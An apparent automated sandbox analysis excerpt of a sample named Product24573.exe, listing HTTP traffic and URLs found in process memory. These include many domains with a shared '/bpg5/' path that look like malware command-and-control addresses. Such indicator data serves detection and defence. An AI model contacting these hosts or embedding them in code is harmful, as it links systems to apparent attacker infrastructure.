          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 30 May 2023 17:34:14 GMTServer: Apache/2.4.57 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 30 May 2023 17:34:17 GMTServer: Apache/2.4.57 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 30 May 2023 17:34:19 GMTServer: Apache/2.4.57 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 30 May 2023 17:34:22 GMTServer: Apache/2.4.57 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: explorer.exe, 00000003.00000002.670378936.00007FFC1B439000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov
          Source: explorer.exe, 00000003.00000002.670378936.00007FFC1B439000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro
          Source: Product24573.exe, 00000000.00000003.384791349.0000000005BAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://en.wikip
          Source: Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.42230.org
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.42230.org/bpg5/
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.42230.org/bpg5/www.42230.orgti-8=LyKdFPBKAe5W
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.42230.orgI
          Source: Product24573.exe, 00000000.00000003.394424226.0000000005BA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agfamonotype.
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.antalyabfe.com
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.antalyabfe.com/bpg5/
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.antalyabfe.com/bpg5/www.antalyabfe.comti-8=LyKdFPBKAe5W
          Source: Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.berlinhealthweek.com
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.berlinhealthweek.com/bpg5/
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.berlinhealthweek.com/bpg5/www.berlinhealthweek.comti-8=LyKdFPBKAe5W
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.com
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.com/bpg5/
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.com/bpg5/www.bisarropainting.comti-8=LyKdFPBKAe5W
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.comAD
          Source: Product24573.exe, 00000000.00000003.385428851.0000000005BA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comams
          Source: Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Product24573.exe, 00000000.00000003.385428851.0000000005BA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comre
          Source: Product24573.exe, 00000000.00000003.385428851.0000000005BA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comsig$E
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fabricadepack.fun
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fabricadepack.fun/bpg5/
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fabricadepack.fun/bpg5/www.fabricadepack.funti-8=LyKdFPBKAe5W
          Source: Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmp, Product24573.exe, 00000000.00000002.404623654.0000000005BA8000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000000.00000003.398796962.0000000005BA0000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000000.00000003.394424226.0000000005BA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Product24573.exe, 00000000.00000003.394424226.0000000005BA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.come.com9
          Source: Product24573.exe, 00000000.00000003.398796962.0000000005BA0000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000000.00000003.394424226.0000000005BA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.coml1
          Source: Product24573.exe, 00000000.00000003.398796962.0000000005BA0000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000000.00000003.394424226.0000000005BA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comt
          Source: Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmp, Product24573.exe, 00000000.00000003.385178049.0000000005BAC000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000000.00000003.385033767.0000000005BAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Product24573.exe, 00000000.00000003.385178049.0000000005BAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/it
          Source: Product24573.exe, 00000000.00000003.385178049.0000000005BAC000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000000.00000003.385033767.0000000005BAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnh
          Source: Product24573.exe, 00000000.00000003.385033767.0000000005BAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnl-gIU
          Source: Product24573.exe, 00000000.00000003.385033767.0000000005BAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnr-t
          Source: Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gomarketing.info
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gomarketing.info/bpg5/
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gomarketing.info/bpg5/www.gomarketing.infoti-8=LyKdFPBKAe5W
          Source: Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.haynicorpon.biz
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.haynicorpon.biz/bpg5/
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.haynicorpon.biz/bpg5/www.haynicorpon.bizti-8=LyKdFPBKAe5W
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jhg61.com
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jhg61.com/bpg5/
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jhg61.com/bpg5/www.jhg61.comti-8=LyKdFPBKAe5W
          Source: Product24573.exe, 00000000.00000003.385896469.0000000005BA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Product24573.exe, 00000000.00000003.385985075.0000000005BA7000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000000.00000003.385896469.0000000005BA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp//icq
          Source: Product24573.exe, 00000000.00000003.385985075.0000000005BA7000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000000.00000003.385896469.0000000005BA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/9
          Source: Product24573.exe, 00000000.00000003.385896469.0000000005BA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Sue
          Source: Product24573.exe, 00000000.00000003.385985075.0000000005BA7000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000000.00000003.385896469.0000000005BA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/U
          Source: Product24573.exe, 00000000.00000003.385985075.0000000005BA7000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000000.00000003.385896469.0000000005BA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/WebdG
          Source: Product24573.exe, 00000000.00000003.385985075.0000000005BA7000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000000.00000003.385896469.0000000005BA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0a
          Source: Product24573.exe, 00000000.00000003.385985075.0000000005BA7000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000000.00000003.385896469.0000000005BA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/c
          Source: Product24573.exe, 00000000.00000003.385896469.0000000005BA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/j
          Source: Product24573.exe, 00000000.00000003.385985075.0000000005BA7000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000000.00000003.385896469.0000000005BA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: Product24573.exe, 00000000.00000003.385896469.0000000005BA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/N
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.660140622.00000000085C8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.musicandgros.com
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.660140622.00000000085C8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.musicandgros.com/bpg5/
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.musicandgros.com/bpg5/www.musicandgros.comti-8=LyKdFPBKAe5W
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mysparexrewards.com
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mysparexrewards.com/bpg5/
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mysparexrewards.com/bpg5/www.mysparexrewards.comti-8=LyKdFPBKAe5W
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.perkibeans.com
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.perkibeans.com)B
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.perkibeans.com/bpg5/
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.perkibeans.com/bpg5/www.perkibeans.comti-8=LyKdFPBKAe5W
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rt66omm.com
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rt66omm.com/bpg5/
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rt66omm.com/bpg5/www.rt66omm.comti-8=LyKdFPBKAe5W
          Source: Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.techwithsun.com
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.techwithsun.com/bpg5/
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.techwithsun.com/bpg5/www.techwithsun.com9
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thetowerbells.com
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thetowerbells.com/bpg5/
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thetowerbells.com/bpg5/www.thetowerbells.comti-8=LyKdFPBKAe5W
          Source: Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vns96.net
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vns96.net/bpg5/
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vns96.net/bpg5/www.vns96.netti-8=LyKdFPBKAe5W
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wearecatalyst.app
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wearecatalyst.app/bpg5/
          Source: explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wearecatalyst.app/bpg5/www.wearecatalyst.appti-8=LyKdFPBKAe5W
          Source: Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: -15B7L5MNM.6.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: -15B7L5MNM.6.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: -15B7L5MNM.6.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: wlanext.exe, 00000006.00000002.649740499.0000000000606000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.6.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: -15B7L5MNM.6.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: wlanext.exe, 00000006.00000002.649740499.0000000000606000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.6.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: wlanext.exe, 00000006.00000002.649740499.0000000000606000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.6.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: wlanext.exe, 00000006.00000002.649740499.0000000000606000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.6.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
